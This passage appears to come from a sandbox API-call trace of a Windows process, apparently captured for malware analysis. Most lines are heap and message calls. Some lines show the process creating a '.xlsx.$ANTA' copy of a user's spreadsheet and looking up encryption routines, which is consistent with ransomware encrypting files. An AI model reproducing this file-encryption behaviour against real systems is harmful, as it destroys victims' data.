hHeap=0x1780000) returned 1 [0078.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.750] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.750] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0078.750] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a46a0 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.751] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a46a0 | out: hHeap=0x1780000) returned 1 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0078.752] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0078.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.752] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\6o-evma xqmykruqi.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.753] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0078.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0078.754] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0078.754] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0078.754] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0078.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0078.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0078.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0078.758] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0078.758] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x2262, lpOverlapped=0x0) returned 1 [0078.758] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0078.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2262) returned 0x48f0048 [0078.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0078.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2262) returned 0x48f22b8 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.762] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2262) returned 0x48f0048 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.762] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0078.762] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0078.763] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0078.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2262) returned 0x48f0048 [0078.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2262) returned 0x48f4528 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.764] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.765] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0078.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0078.765] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0078.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0078.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0078.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0078.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.766] PeekMessageW (in: lpMsg=0x144e63c, 